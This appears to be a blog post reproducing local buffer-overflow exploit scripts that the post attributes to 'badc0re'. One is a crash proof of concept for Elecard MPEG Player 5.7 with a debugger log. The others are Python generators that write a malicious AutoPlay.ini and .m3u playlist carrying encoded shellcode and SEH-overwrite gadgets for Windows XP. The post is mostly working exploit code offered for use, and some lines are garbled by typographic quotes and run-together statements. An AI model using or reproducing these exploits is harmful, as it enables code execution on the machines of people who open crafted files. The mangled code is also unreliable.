ElecardDVDPlayer Local Buffer Overflow(SEH) PoC


Link

#!/usr/bin/python
#
#
# Elecard MPEG Player 5.7 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.7.100629
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra bytes.
#
#
# ———————————————————————
#
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000104 ebx=000037bb ecx=0000002a edx=00000104 esi=0013c73c edi=0013ffff
# eip=0045563e esp=0013c6c0 ebp=0013cb14 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x5563e:
# 0045563e f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# 0:000> g
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=44444444 edx=7c9032bc esi=00000000 edi=00000000
# eip=44444444 esp=0013c2f0 ebp=0013c310 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# <Unloaded_i.dll>+0x44444443:
# 44444444 ??              ???
# 0:000> !exchain
# 0013c304: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 0013cb04: <Unloaded_i.dll>+44444443 (44444444)
# Invalid exception stack at 43434343
#
# ———————————————————————
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 24.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#

f=open(“default5.m3u”,”w”)
print “Creating expoit.”
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
junk=”\x42″*4
nseh=”\x43″*4
seh=”\x44″*4
junk1=”\x41″*20165

try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
print “File cannot be created”

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56″);
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
junk1=”\x42″*4
nseh=”\x43″*4#”\xeb\x0a\x90\x90″
seh=”\x44″*4#”\x7a\x15\xbd\x77″#”\xeb\x0a\x90\x90″
seh1=”\x90″*4#77bd157a#”0x00463EB6″
junk=”\x41″*19995
nop=”\x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: